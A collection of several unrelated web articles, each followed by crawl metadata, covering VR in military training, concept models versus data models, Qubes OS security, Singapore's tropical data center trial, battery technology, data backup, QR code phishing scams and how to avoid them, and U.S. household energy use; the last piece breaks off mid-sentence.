Militaries in all types be it Air, Water or Land have been using virtual reality for a long time now keeping in mind its versatility. Primarily this is used in the battlefield training for the soldiers in all the aspects to prepare them for real-time scenarios. Let's have a look at what Virtual Reality is: What is Virtual Reality? Virtual reality can seem to be a paradox but it can be understood as the generation of a virtual world and animations which can be operated from the real world as if we are a part of that virtual space. Technically the term virtual reality refers to the usage of computerized technology and devices to create virtual simulations. This places the viewer in the same setting so that they can not only see the image but can feel it happening right in front of their eyes, as in 3D techniques. Which is also an aspect of virtual reality. Being in that technology embedded with the required particular devices the users can use their sense stimulations to move up and down and to see everything as if they are really a part of a virtual world. Currently, virtual reality is being used in many forms in the entertainment spaces, in gaming, in education, and in medical and military training as well. The most common example for understanding virtual reality can be a 3 Dimensional movie by the usage of special glasses the viewer can see the entire thing as if it's happening right in front of their eyes. Similarly, the lights and sound effects are taken into consideration so as to ensure the feeling of the thing happening right in front of our eyes even though nothing of it is real. Technological advances play an important role in understanding and being a part of the VR world as there exist headsets which the users wear on their head while playing any game of that sort with the most popular being tennis, and it's used in the way to make them believe that they are on a tennis court and however they move their character in the game moves. Have a look at our blog on Extended Reality Hence it can be said that with the help of these devices and animation the required usage can be made. Coming back to the military sector, the military has a sole purpose of training the soldiers harmlessly using such virtually real techniques as it can serve both ways, it's harmless and it's more of a real time preparation for the same. Role of Virtual Reality in Military Let's have a look at how various forms of militaries use Virtual Reality: 1. Air Force The Air Force mainly uses virtual reality to teach the flight stimulations to the train all the kinds of pilots with respect to their specification, they happen to teach everything running form are used to teach flying skills, how to deal with an emergency and communication with ground control, all of it but virtually. This deals with providing various avenues to train the newbies using virtual reality they are provided with prototypes of the aircraft and fighter planes to be able to try their hand and The devices that are used to replicate work just like the real aircraft setup which is able to tilt, move or twist to replicate the movements of an aircraft to work in the condition of the practicality before being the real combat sphere of warfare and skies. They would be seeing all of what they might see in a real scenario on one or multiple monitors and screens to give them an all-over view of the sky. This makes them understand the pressure and real-time consequences of their mistakes and a practical amplification of it during the training so as to be able to generate perfection over time. The Navy is said to have full usage of Virtual Reality to be able to teach the usage of the submarine and generate the real underwater experience while training so that the people learning can continue to work on real-time devices. The Navy primarily uses this to teach the complex working of the submarines, wartime ships to be able to provide a good way of teaching steering, navigation and general ship handling techniques and teach the new seamen to deal with the real time emergency salutations as well as necessary communications. Also this focus on generating operational entails from the ground control temperature changes and motion controls. However, the most exciting feature about the navy using virtual reality is that the submarine replica does not have monitor screens; they rely on the frequency and it relies upon the instrument readings to be able to move and seek through the position of the submarine in the water. The Army uses VR headsets and devices to create the stimulation of military situations and operations. With the help of such devices, the illusions of the jungle and icy hills or whatever required can be created so as to help them train by imagining how they would be dealing with the same scenario in the real-life world and compelling them to be a part of the same scene. This is often done with the help of connected VR Head and eyewear and a replica of devices like guns and knives that would be used by them and in some cases they are given the objects that they might be carrying in the wartime scenario in terms of weights to be able to generate more and more perfection connected to their body with a tracking system to be able to help plot movements which will be shown to them via a virtual screen. Recommended blog - Augmented Reality Here however the aim becomes to teach the unit to work as a team and work in a predetermined and guided way so as to encounter a scene and act accordingly. The main goal remains not to just teach the real replica situations but to teach them how to operate in a team and make the maximum in the combat citation they encounter. Apart from this, there is another significant training required in the military sector which is of medical battlefield training. 4. Battlefield Medical Training To maintain the medical adequacy of the soldier after a traumatizing event, virtual reality training can be used to treat PTSD (Post Traumatic Stress Disorder) this is done with the help of a virtual tool which enables them to have a relatively calmer experience of what they experienced during the stressful situation and help them react in the way they wanted and have a less fearful controlled version of it, to gradually have a check on their stress. Another way the virtual training is important medically is in the forms of rescue camps, virtual situations are made to deal with so as to train them for an on-field treatable emergency and first aid on set monitors and devices in which the trainees are enabled to work on the projected emergency. As military training is harsh and draining and it can be initially emotionally stressful for some this can be medically helped by setting up boot camps, to make them aware of the real-time training and prepare them for that. They can be during the training of harsh scenarios in a safe space equipped with a mounted display, motion tracker, and wireless virtual weapons to be able to learn to operate them safely. Although this needs to be considered that no amount of virtual training can be an alternative to real-time training and no amount of making something virtual seem real, can replace it. Yet there are several advantages of the usage of virtual reality in the military. Advantages of VR in Military VR Advantages in Military The usage of various devices is way more military budget saving as compared to using the real devices in even the basic teaching. This can be done without commuting to a battlefield or without even having to set up specific training and operational vehicles, ships or even weapons. The virtual weapons save the money as it enables the reuse and repeated training without wasting anything causing to not spend extra money on per trainee. This saves money as well as resource depletion which can be used somewhere else if we go on to use the virtual means of training. The ways to use the technical devices are way more convenient and easy to operate as compared to original devices. This not just provides for a smoother version of the devices for learning but also leaves room for being able to make mistakes and learn from them. Also, the virtual reality tools can make your practice in a safe environment without making the trainees feel intimidated by another such encounter. 3. Prevents Disasters Life loss during training is a possible scenario in the case of an accident, be it in the time of learning to operate the devices or operating them in the wrong manner. When the training takes place virtually it leaves a lesser room comparatively to such accidents and conditions, before even a real combat situation or a real-time training the trainees can be somewhat prepared about the real-time experience harmlessly making it an effective way to be used in the military. Recommended blog - IoT in Disaster Management Being in a military sector is not just a matter of patriotism but also is of perfection and responsibility combined with inevitable and frequent disasters. Virtual reality can never replace real training in such a field, it's true but it's because of virtual reality that several avenues of better learning be it in the army, navy or air force are being operational for the trainees to make them become efficient in their work. The military was one of the first sectors to use virtual reality as a part and parcel of its training and it still continues to use that. Model up-gradation in the forms of replicas, software up-gradation, and as well as separate visuals for level for training is required and they are also taken care of making military usage significant.
<urn:uuid:542d60f2-358c-4933-baa7-a95bbec94d8f>
CC-MAIN-2024-38
https://www.analyticssteps.com/blogs/applications-virtual-reality-military
2024-09-16T12:30:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00524.warc.gz
en
0.965836
1,888
2.78125
3
Concept Models vs. Data Models Concept models are a core technique mandated by the Business Agility Manifesto. Let's be very clear what a concept model is not. A concept model is not a data model. The focus of the two kinds of model is altogether different. - A data model is aimed at how you best organize data for storage in a system. A good one will start by trying to reflect the entities that exist in the real world, so the model is not skewed to a particular use or application. - A concept model, in contrast, is aimed at disambiguation of the things people say and write. Such communications can include requirements for system design but, much more importantly, things like business policies, regulations, agreements, notices (etc.) that may be far removed from system design activity. In other words, a concept model is a technique for improving business communication across the board. A capacity for disambiguation can obviously assist system design, but it's not about system design. To appreciate the need for a concept model, first you must appreciate that business communication is often replete with ambiguity — full of semantic potholes. If you've never been burned by miscommunication, then you'll never really appreciate the need for a concept model. You can stop reading here. But of course we've all been victimized in that respect! The Real World Test As above, a good data model will try to reflect the entities that exist in the real world, so the model is not skewed to a particular use or application. Let's call that the Real World Test. Of course, it's hard to prove what's actually in the real world, so the Test is more art than science. There are no built-in checks that you have it right. It's all about craftsmanship and informal consensus ('Yeah, that looks about right.'). A lesser data model will not apply the Test as diligently — or apply it at all. As a consequence, if you don't share the designer's perspective on the problem space, then the data the data model ultimately defines is unlikely to hold much value for you. Think silo. Lesser data models can go off the rails for a host of reasons. Common causes include these: - The data model is created for some specific analytic purpose(s), and so 'sums up' the real world in a manner best suited to particular computations. - The data model is created to support some specific points of data access or usage (e.g., GUIs, interfaces, migration, exchange, etc.), and so is skewed to those particular handshakes. - The data model (usually a class diagram) is created to aid and support software development, and so gradually (or quickly) drifts toward reflecting the internal reality of the software system design. But even diligent adherence to the Real World Test runs into difficulties when the things (entities) in the problem space don't actually exist in the real (physical) world. Virtually every problem space includes at least some things that are purely inventions of the human mind. At the extreme, think insurance and finance. What do you do in that case? Consistency Tests for Language The two-part answer is to (a) entertain only ideas that are completely innocent of system design and (b) re-orient yourself toward ensuring the consistency of what you say and write about those ideas. Now we're back to business communication and disambiguation — that is, to concept models. A concept model necessarily focuses on natural language. (There's no way to talk or write about complex ideas if they are not expressed in some form.) A concept model provides patterns, both built-in and add-on, to 'prove' that what is said or written about a problem space is consistent (or not!) with everything else that is said and written about it. If you are thinking about a concept model as primarily a diagram, you're missing the picture. A graphical representation of the patterns in a concept model can be quite helpful, but it's a convenience, not a necessity. This fact alone would make concept models distinct from data models. Who would want a data model if not graphical? You might as well go directly to the schema (database definition). So, understanding a concept model requires full appreciation of what it brings to the table in determining the consistency of what is said and written. The first and most fundamental step in ensuring consistency in what is said and written is robust business definitions of all concepts. That's where the rubber meets the road. All definitions must be unique, and each must express a distinguishable concept. A simple glossary is a step in the right direction, but falls way short of the quality of definitions needed for disambiguation. Internal to the wordings of robust definitions need to be worked-out schemes for such things as: - generalization/specialization — e.g., a tiger is a mammal - classification — e.g., Paris is a city - partitive relationships — e.g., a chassis is a part of a vehicle In other words, definitions not only need to be business-oriented, they need to act as artifacts of knowledge representation. How else can you hope to prove the consistency of what is said and written? Consistency Checks for Sentences Try writing a sentence without a verb. In most natural languages it's impossible. Even in languages where it's possible, grammatical rules about defaults apply. The bottom line is that there is always a verb in a sentence, even if implicit. Sentences are how we communicate. A sentence represents a complete thought (a proposition in logic). A statement without a verb, explicit or otherwise, simply isn't a complete thought. Incomplete thoughts, of course, are never high-quality thoughts. Neither are sentences expressed using ambiguous or inconsistent verbs. Not surprisingly therefore, concept models place as much emphasis on verb and verbs phrases as on nouns. These verbs and verb phrases in your business vocabulary are 'add-on' patterns of expression. Your business, for example, must decide whether it prefers 'party makes request' or 'party submits request' in sentences that are written. Maybe either one is acceptable (i.e., they are synonyms). Or maybe they mean something different altogether. In writing complex thoughts, by far the most common cause of ambiguity (beyond misuse of nouns and poor definitions) is missing or inconsistent verbs. When you step up to that challenge in business communication you'll realize doing a data model is nonsensical as a starting point. A concept model is basically a set of language patterns that scales in disambiguating large amounts of business communication (including business rules, of course). It provides built-in checks you have expressed something right. It's not about craftsmanship and informal consensus; it's about engineering consistency and clarity where it counts the most — in the language we use to communicate business knowledge. The Business Agility Manifesto: Building for Change, by Roger T. Burlton, Ronald G. Ross, and John A. Zachman, (2017) https://busagilitymanifesto.org/ Concept models are a central focus of the OMG standard Semantics of Business Vocabulary and Business Rules (SBVR). For more information on SBVR, see SBVR Insider on BRCommunity.com, http://www.brcommunity.com/standards.php?id=620 # # #
<urn:uuid:b60f255f-f389-4648-9460-a0c936ca7f2c>
CC-MAIN-2024-38
https://www.brcommunity.com/articles.php?id=b956
2024-09-11T21:00:58Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651400.96/warc/CC-MAIN-20240911183926-20240911213926-00124.warc.gz
en
0.946525
1,543
2.71875
3
Qubes OS - A Security-Oriented Operating System Qubes OS is a security-oriented operating system (OS). The OS is the software that runs all the other programs on a computer. Some examples of popular OSes are Microsoft Windows, Mac OS X, Android, and iOS. Qubes is free and open-source software (FOSS). This means that everyone is free to use, copy, and change the software in any way. It also means that the source code is openly available so others can contribute to and audit it. Why is OS security important? Most people use an operating system like Windows or OS X on their desktop and laptop computers. These OSes are popular because they tend to be easy to use and usually come pre-installed on the computers people buy. However, they present problems when it comes to security. For example, you might open an innocent-looking email attachment or website, not realizing that you’re actually allowing malware (malicious software) to run on your computer. Depending on what kind of malware it is, it might do anything from showing you unwanted advertisements to logging your keystrokes to taking over your entire computer. This could jeopardize all the information stored on or accessed by this computer, such as health records, confidential communications, or thoughts written in a private journal. Malware can also interfere with the activities you perform with your computer. For example, if you use your computer to conduct financial transactions, the malware might allow its creator to make fraudulent transactions in your name. Aren’t antivirus programs and firewalls enough? Unfortunately, conventional security approaches like antivirus programs and (software and/or hardware) firewalls are no longer enough to keep out sophisticated attackers. For example, nowadays it’s common for malware creators to check to see if their malware is recognized by any signature-based antivirus programs. If it’s recognized, they scramble their code until it’s no longer recognizable by the antivirus programs, then send it out. The best of these programs will subsequently get updated once the antivirus programmers discover the new threat, but this usually occurs at least a few days after the new attacks start to appear in the wild. By then, it’s too late for those who have already been compromised. More advanced antivirus software may perform better in this regard, but it’s still limited to a detection-based approach. New zero-day vulnerabilities are constantly being discovered in the common software we all use, such as our web browsers, and no antivirus program or firewall can prevent all of these vulnerabilities from being exploited. How does Qubes OS provide security? Qubes takes an approach called security by compartmentalization, which allows you to compartmentalize the various parts of your digital life into securely isolated compartments called qubes. This approach allows you to keep the different things you do on your computer securely separated from each other in isolated qubes so that one qube getting compromised won’t affect the others. For example, you might have one qube for visiting untrusted websites and a different qube for doing online banking. This way, if your untrusted browsing qube gets compromised by a malware-laden website, your online banking activities won’t be at risk. Similarly, if you’re concerned about malicious email attachments, Qubes can make it so that every attachment gets opened in its own single-use disposable qube. In this way, Qubes allows you to do everything on the same physical computer without having to worry about a single successful cyberattack taking down your entire digital life in one fell swoop. Moreover, all of these isolated qubes are integrated into a single, usable system. Programs are isolated in their own separate qubes, but all windows are displayed in a single, unified desktop environment with unforgeable colored window borders so that you can easily identify windows from different security levels. Common attack vectors like network cards and USB controllers are isolated in their own hardware qubes while their functionality is preserved through secure networking, firewalls, and USB device management. Integrated file and clipboard copy and paste operations make it easy to work across various qubes without compromising security. The innovative Template system separates software installation from software use, allowing qubes to share a root filesystem without sacrificing security (and saving disk space, to boot). Qubes even allows you to sanitize PDFs and images in a few clicks. Users concerned about privacy will appreciate the integration of Whonix with Qubes, which makes it easy to use Tor securely, while those concerned about physical hardware attacks will benefit from Anti Evil Maid. How does Qubes OS compare to using a “live CD” OS? Booting your computer from a live CD (or DVD) when you need to perform sensitive activities can certainly be more secure than simply using your main OS, but this method still preserves many of the risks of conventional OSes. For example, popular live OSes (such as Tails and other Linux distributions) are still monolithic in the sense that all software is still running in the same OS. This means, once again, that if your session is compromised, then all the data and activities performed within that same session are also potentially compromised. How does Qubes OS compare to running VMs in a conventional OS? Not all virtual machine software is equal when it comes to security. You may have used or heard of VMs in relation to software like VirtualBox or VMware Workstation. These are known as “Type 2” or “hosted” hypervisors. (The hypervisor is the software, firmware, or hardware that creates and runs virtual machines.) These programs are popular because they’re designed primarily to be easy to use and run under popular OSes like Windows (which is called the host OS, since it “hosts” the VMs). However, the fact that Type 2 hypervisors run under the host OS means that they’re really only as secure as the host OS itself. If the host OS is ever compromised, then any VMs it hosts are also effectively compromised. By contrast, Qubes uses a “Type 1” or “bare metal” hypervisor called Xen. Instead of running inside an OS, Type 1 hypervisors run directly on the “bare metal” of the hardware. This means that an attacker must be capable of subverting the hypervisor itself in order to compromise the entire system, which is vastly more difficult. Qubes makes it so that multiple VMs running under a Type 1 hypervisor can be securely used as an integrated OS. For example, it puts all of your application windows on the same desktop with special colored borders indicating the trust levels of their respective VMs. It also allows for things like secure copy/paste operations between VMs, securely copying and transferring files between VMs, and secure networking between VMs and the Internet. How does Qubes OS compare to using a separate physical machine? Using a separate physical computer for sensitive activities can certainly be more secure than using one computer with a conventional OS for everything, but there are still risks to consider. Briefly, here are some of the main pros and cons of this approach relative to Qubes: - Physical separation doesn’t rely on a hypervisor. (It’s very unlikely that an attacker will break out of Qubes’ hypervisor, but if one were to manage to do so, one could potentially gain control over the entire system.) - Physical separation can be a natural complement to physical security. (For example, you might find it natural to lock your secure laptop in a safe when you take your unsecure laptop out with you.) - Physical separation can be cumbersome and expensive, since we may have to obtain and set up a separate physical machine for each security level we need. - There’s generally no secure way to transfer data between physically separate computers running conventional OSes. (Qubes has a secure inter-VM file transfer system to handle this.) - Physically separate computers running conventional OSes are still independently vulnerable to most conventional attacks due to their monolithic nature. - Malware which can bridge air gaps has existed for several years now and is becoming increasingly common. Qubes OS - A Security-Oriented Operating System Reviewed by Zion3R
<urn:uuid:08f29de1-4ab4-4798-ba31-5542499e3f4c>
CC-MAIN-2024-38
https://www.kitploit.com/2017/12/qubes-os-security-oriented-operating.html
2024-09-11T19:13:24Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651400.96/warc/CC-MAIN-20240911183926-20240911213926-00124.warc.gz
en
0.936421
1,786
3.09375
3
Singapore plans to conduct trials of what it calls the world’s first data center designed specifically for tropical climates, as part of a bid to drive innovation and explore new green technologies. Initiated by the Infocomm Development Authority of Singapore (IDA), the Tropical Data Center (TDC) project will be set up in partnership with hardware makers and industry experts. Partners will provide either hardware, software or expertise, and the trial will be conducted in a test environment at a Keppel Data Centre facility. Organizations that have signed up so far include Dell, Futjitsu, Hewlett Packard Enterprise, Huawei and Intel, as well as ERS, The Green Grid, and the Nanyang Technology University (NTU). The objective is to create a proof-of-concept to demonstrate that data centers can function optimally at temperatures of up to 38 degrees Celsius, and ambient humidity of 90 percent and higher. It’s getting hot in here According to the IDA, data centers are typically cooled to between 20 and 25 degrees Celsius and kept to within 50 to 60 percent relative ambient humidity. A TDC could hence reduce energy costs by up to 40 percent, and significantly reduce carbon emissions. While running data centers at higher temperatures is nothing new, such environments are typically built away from the tropics, or entail the use of air-side economizers in cooler climates to bring down cooling costs. A successful TDC trial could convince CIOs and data center managers that temperatures can be increased in a data center without harming either performance or reliability. While details are still being worked out, some potential test setups could include having no temperature controls but with controlled humidity, or an absence of both temperature and humidity controls. The TDC will be set up in the third quarter of 2016, and will run stimulated workloads with a projected time frame of up to a year. “With Singapore’s continued growth as a premium hub for data centers, we want to develop new technologies and standards that allow us to operate advanced data centers in the most energy efficient way in a tropical climate,” said Khoong Hock Yun, assistant chief executive at the IDA. “New ideas and approaches, such as raising either the ambient temperature or humidity, will be tested to see if these can greatly increase our energy efficiency, with insignificant impact on the critical data center operations,” he added. According to IDA, data centers accounted for seven percent of Singapore’s total energy consumption in 2012, and are projected to reach 12 percent of the country’s total energy consumption by 2030 due to continued growth of data centers based here.
<urn:uuid:371d4d58-a854-4560-8bc3-a4b542b8e600>
CC-MAIN-2024-38
https://www.datacenterdynamics.com/en/news/singapore-to-trial-first-tropical-data-center-in-q3-2016/
2024-09-13T00:58:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00024.warc.gz
en
0.946211
548
2.546875
3
Power has been a constant necessity to us since the inception of human evolution. And with a source of power that is both renewable and clean, we can counter power shortages. Our best shot of achieving that energy is through the advancement of Battery Technology. To better understand this industry, we need to understand the basics first. Batteries are essentially a device that can transform stored chemical energy into electricity. One or more cells consisting of a positive electrode, a negative electrode, an electrolyte, and a separator make a battery. Battery companies are constantly searching for better chemistries to supply more power at a cheaper cost. There are three primary battery technologies through which we can get an ample amount of energy supply in the future. They are Lithium-ion batteries, Lithium-sulphur batteries, and Solid-state batteries. Lithium-ion is slowly emerging as the most advanced battery technology available. The global market of batteries is also expanding at a steady pace. In 2020 its valuation was 92.0 billion USD, and by 2025 it is expected to grow to 152.3 billion USD. The battery is a way to store energy. Hence, it is needed to operate almost everything from your phone to your laptop. Its market is also proliferating with the extensive use of batteries for electric vehicles (EV) and mobile computing. Due to the fast urbanization and constant increase in population, renewable energy becomes potent for the continuation of life. And battery technology gives us a surefire solution to that. The enterprise tech world is evolving with newer ambitions. While the wings of innovation are spreading to newer skies, the technologists are finding it hard to play catch-up and are making sure they are in tune with the technology juggernaut. CIOCoverage aims to bridge this very gap that exists between the tech-savvy where he rests, in the very heart of it. Awakening a keen insight in you to move along the flow, CIOCoverage works to make the entrepreneurs, versatile to the sturdy technological influences.
<urn:uuid:8cc31449-642c-41d2-8502-bd9a2fecee0f>
CC-MAIN-2024-38
https://www.ciocoverage.com/top-10-leading-battery-technology-solution-providers-to-watch-in-2022/
2024-09-14T05:00:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00824.warc.gz
en
0.95684
415
2.984375
3
In the present era, our current ecosystem has become increasingly dependent on digital technologies and gizmos. This has also resulted in cybercriminal activities becoming a burgeoning nuisance. Hence, there is no doubt that both data backup and data security have become increasingly significant in carrying out business operations. The above fact is supported by news, media, entertainment, corporate enterprises, and the financial sector readily deploying information technology. Where cybercrime security companies state that 12 cyber attacks occur every minute along with a 50% increase in unique attacks and malware, the US is by far the largest country to have stopped the maximum number of cyber-attacks in 2023. Fortunately, it isn’t just cyber crime that observed a skyrocketing increase last year; data backup and security could also be seen mounting. Specifically, most online businesses and ecommerce stores began to gather a tremendous amount of volatile information, thus creating Big Data. The data can include extraordinarily personal and sensitive information such as PII (Personally Identifiable Information) and SPI (Sensitive Personal Information). Without proper interventions like adequate file backup and cybersecurity measures, those with malevolent intentions can quickly attack this information. A recent study revealed that over 33 billion accounts are likely to get breached in 2023, so countless organizations and renowned establishments actively pursue keeping customers and their information safe by arranging several security tactics. This can include the likes of cloud backup, Online Backup, and offline Backup, to name a few. To delve more into this subject, here are some prominent reasons why Data Backup and Security Solutions are mandatory today. A Legal Requirement in Many Countries Due to an incredible loss of private and personal information in the past decades that caused billions of dollars in damages, International Data Privacy Laws have been established and carried out diligently. Not following these security parameters can effectively produce legal actions by the presiding government and authorities. In the United States, several Data Privacy Laws regulate how a person’s private data is collected, handled, processed, shared, and used. Furthermore, specific Federal Laws are also imposed to protect citizens from data misuse. Likewise, throughout Europe, the GDPR (General Data Protection Regulation) is essential to the EU Privacy Law and Human Rights Law. Following these laws and legal regulations is compulsory. They generally deal with data collection, transfer of personal data, as well as duties of data controllers and processors. On the other hand, industry-specific laws to protect personal information and data have also been recognized and vigorously implemented to safeguard users and customers. For instance, the PCI DSS (Payment Card Industry Data Security Standard) is an information security standard for handling credit cards from major card brands. Apart from being a legal requirement, many brands and business approach Backup and Security Solution Providers as it offers them various rewards and welfare. Some of the most noticeable ones include: - Data loss prevention can be instigated for many reasons, such as hardware or software failures, natural disasters, human errors, and malicious attacks. - Resolute auditing and reporting. Enterprises are delegated to save their financial records and accounting data for tax reporting. Keeping backups helps regular businesses to keep their operations running. - Archiving information enables the safe accumulation and storage of client-related details. Moreover, data backups also simplify the creation of archives and ease of access for those who need the information to carry out their duties and responsibilities. - Faster data recovery in an event where a business is exposed to a virus, phishing, or hacking attack. If a system becomes infected by malware such as ransomware, data backups aid in recovering essential and sensitive data. - Competitive value. It is vital for businesses today to resume operations and recover as quickly as possible. Data backup gives companies a competitive edge over their rivals within their industries and market niches. - They are mitigating downtime. An outcome of data loss is additional work needed to restore data, and as data is being recovered, business operations are kept on hold. Backup data can reduce downtimes which is a complete waste for many ventures. A Strong Proponent of Network Security When chasing after robust information security, IT security, or computer security, people need to pay more attention to the significance of data backup and security. On the contrary, data security and data backup are essential components of cybersecurity measures. Primary data failures caused by malicious attacks, such as viruses or malware attacks, as well as hackers or cybercriminals, can be lessened with the assistance of data backup and data security. Backup copies enable enterprises and establishments to restore data from earlier to help ventures recover from an unforeseeable event. n today’s world, keeping information safe and secure is essential for businesses to sustain operations and remain profitable. Loss of valuable data can result in ventures and their operations coming to a complete halt and losing reputation among the public. Recovering from such an incident is impossible because a loss of trust eventually results in a complete loss of services and customers. Therefore companies and organizations must survive so that they not only install but also carry out the best data security practices. The importance of data backups and security is undeniably indisputable to ensure data security and protection in the event of data theft or loss. Why should I back up my data? It is a legal requirement for ventures and businesses in many parts of the world and offers countless benefits and a competitive edge. What data should I back up? In an event such as a natural disaster, human error, or a malicious attack, data backup can help you quickly recover sensitive and valuable data, resulting in reduced downtime and restoring business operations. What are the different types of Backup? The three main types of data backup include: Full Backup – a copy of all available files and folders regularly stored in secondary storage media. Incremental Backup – employs one full Backup at first and then succeeds in a Backup that stores only that data which has been modified since the last full Backup. Differential Backup – the Backup consists of a complete backup and subsequent backups to store changes made to files and folders after the first Backup. What are the benefits of cloud backup? Cloud data backup offers a wide range of benefits, such as: Assisting in annual reporting exercises. Enhancing security and protection of data from malicious activity. Management simplification by making restoration of data less stressful and time-consuming. Reliable reproduction after data is restored. Significant cost savings by reducing workforce expenses. Workload reduction as backup data can overcome redundancies such as manual data recovery.
<urn:uuid:5ca34c11-51b8-418a-a49d-fdde48b22fb6>
CC-MAIN-2024-38
https://evolutionitservice.com/the-importance-of-backup-and-security/
2024-09-15T09:41:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00724.warc.gz
en
0.949076
1,326
2.75
3
A guide to understanding and avoiding a new type of cyberattack that targets both individuals and organizations QR codes are everywhere in our modern lives, easily linking us to restaurant menus, websites, and apps with a quick scan from our phones. However, as we use QR codes more often, we also face more risks from attackers. This is how QR code phishing works and how it’s becoming more common. QR code phishing, also known as quishing is a type of cyberattack that has been growing steadily in popularity. In fact, according to one report, one QR phishing campaign increased by 2,400% since May 2023. This article will teach you how to identify and prevent QR Code phishing. What is QR Code Phishing? QR codes are square-shaped images that contain information such as URLs, contact details, or payment information. They are often used to simplify and speed up the process of accessing websites, making payments, or sharing information. However, they can also be used by cybercriminals to trick you into visiting malicious websites, downloading malware, or giving away your personal or financial information. This is called QR code phishing, and it is a new type of cyberattack that targets your smartphone. QR code phishing works by exploiting the trust and convenience that QR codes offer. You may scan a QR code that you see on a poster, a flyer, a product, or a website, expecting it to take you to a legitimate site or service. However, the QR code may have been tampered with or replaced by a hacker, and it may redirect you to a fake site that looks like the real one. There, you may be asked to enter your login credentials, your credit card details, or other sensitive information. Alternatively, the QR code may download a malicious app or file on your phone, which can compromise your device and data. Example of what a QR Code scam looks like 5 Common Scenarios of QR Code Scams QR code email scam Scammers often send phishing emails with QR codes in them. This method is called “quishing.” These emails will pretend to be from a reputable company and ask you to scan the QR code in their email. For example, they may say that your payment for an online order was unsuccessful, and you need to scan the QR code to enter your credit card information again. If victims scan the QR code, they will go to a website that looks legitimate, and enter their payment information. Then, the cybercriminal will have their credit card information. QR code payment scam QR codes can be used by legitimate businesses for contactless payments. Using QR codes for payments became very popular during the peak of the COVID-19 pandemic since it allowed customers to buy things without touching card readers, reducing the risk of infection. However, scammers can put QR codes in public places to take your money or credit card information. For example, criminals have put signs in parking lots telling people that they can scan the QR code to pay for parking. The QR code would take drivers to a website that looked real but wasn’t QR code package scam If you ever get a strange package in the mail with a QR code, don’t scan it. In this kind of QR code fraud, criminals will send you a package in the mail that you never ordered. There’s a QR code inside the package (or on the box) that you can scan to get more details about the order or to send your order back. The QR code will take you to website that asks you to enter your personal information, like your credit card number. QR code cryptocurrency scam QR codes are often used for crypto transactions. However, criminals can use QR codes to steal cryptocurrency from victims. They may contact you offering a “giveaway” that says you can get twice the crypto if you send them crypto first. However, you’ll never get any crypto back. Scammers may also invite you to join an “investment” and ask you to send them crypto. These scammers disappear with your crypto and you’ll probably never hear from them again. QR code donation scam Scammers may copy a charity or make a fake charity to take your money or credit card information. They may put QR codes on flyers or send them to you through text or email asking you donate money to a cause. How to Avoid QR Code Phishing? QR code phishing can be difficult to spot, as you may not be able to see the URL or the destination of the QR code before you scan it. However, there are some steps you can take to protect yourself and your smartphone from this danger. Here are some tips to avoid QR code phishing: - Be cautious where you scan. Only scan QR codes from reliable sources, such as official websites, products, or services. Don’t scan QR codes from unknown or dubious sources, such as unwanted emails, messages, or ads. - Use a QR code scanner app that has security features. Some QR code scanner apps can identify and warn you if a QR code is harmful or leads to a phishing site. You can also use a QR code scanner app that lets you preview the URL or the content of the QR code before you open it. - Check the URL or the site before you enter any information. If you scan a QR code and it takes you to a website, make sure that the URL matches the expected site and that it has a secure connection (https). Look for any signs of phishing, such as spelling mistakes, poor design, or unusual requests. - Do not download or open any files or apps from QR codes. QR codes should not ask you to download or install anything on your phone. If a QR code asks you to do so, do not continue and delete the file or app right away. - Keep your phone and apps updated. Make sure that your phone and apps have the latest security patches and updates, which can help you prevent malware infections and phishing attacks. How Microsoft Technologies Can Help? Microsoft offers a range of technologies and solutions that can help you stay safe from QR code phishing and other cyberthreats. Some of these include: Microsoft 365 Defender. This is an enterprise grade security solution that provides best in class mail filtering. It can identify threats, including quishing, and quarantine the malicious messages before they reach your inbox. Microsoft Defender for Endpoint. This is a cloud-based security solution that provides comprehensive protection for your devices, data, and identity. It can detect and block malicious QR codes, websites, apps, and files, and it can alert you of any suspicious or risky activities on your phone. Microsoft Authenticator. This is an app that enables you to use two-factor authentication (2FA) for your online accounts, which adds an extra layer of security to your login process. It can also scan QR codes and verify their authenticity, and it can generate secure passwords for your accounts. Microsoft Edge. This is a web browser that has built-in security and privacy features, such as SmartScreen, Tracking Prevention, and InPrivate mode. It can warn you of any phishing or malicious sites that you may encounter, and it can block unwanted ads and trackers. By following these tips, you can enjoy the benefits of QR codes without putting yourself at risk of QR code phishing. Remember, always think before you scan, and stay vigilant of any suspicious or unexpected QR codes. If you want to bolster your cybersecurity, feel free to reach out to Softlanding. We have a number of services or solutions to help you prevent, detect and remediate phishing attacks
<urn:uuid:f321acd5-ec81-412f-8b9d-02ed8e703733>
CC-MAIN-2024-38
https://www.softlanding.ca/blog/qr-code-phishing-what-you-need-to-know-and-how-to-stay-safe/
2024-09-15T11:29:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00724.warc.gz
en
0.94625
1,597
3.28125
3
Household Electric Consumption Varies by Region According to the newest residential energy consumption report (titled “2020 Residential Energy Consumption Survey”), published by the U.S. Energy Information Administration (EIA), U.S. households consumed an average of 76.7 million British thermal units (MMBtu) of site energy in 2020. The average site energy a household uses is largely correlated with the average outdoor temperature. For example, households in colder climates, where space heating equipment is used more intensely, tend to consume more site energy than households in warmer parts of the county. Of the 15 states with average annual temperatures above the national average (59.4°F), the average households in every state except Oklahoma used less energy than the national average. “Site energy” refers to the amount of energy that enters a home, including electricity from the grid, electricity from onsite solar panels, natural gas, propane, and fuel oil. Site energy includes different forms of energy, and with respect to electricity, it does not account for the losses associated with conversion of primary fuels to electricity or the electrical losses in the transmission and distribution system. “Site energy consumption” is a combination of the energy consumption from all energy end uses in a home, including seasonal end uses, such as space heating and cooling, as well as non-seasonal end uses, such as cooking and consumer electronics. EIA added that, “Although our analysis averages site energy consumption across a large number of homes to obtain state-level estimates, the consumption within an individual home can vary widely based on the efficiency of the heating and cooling equipment.” In 2020, according to the report, Hawaii was the warmest state, using an average of 30.3 MMBtu per household. Only six 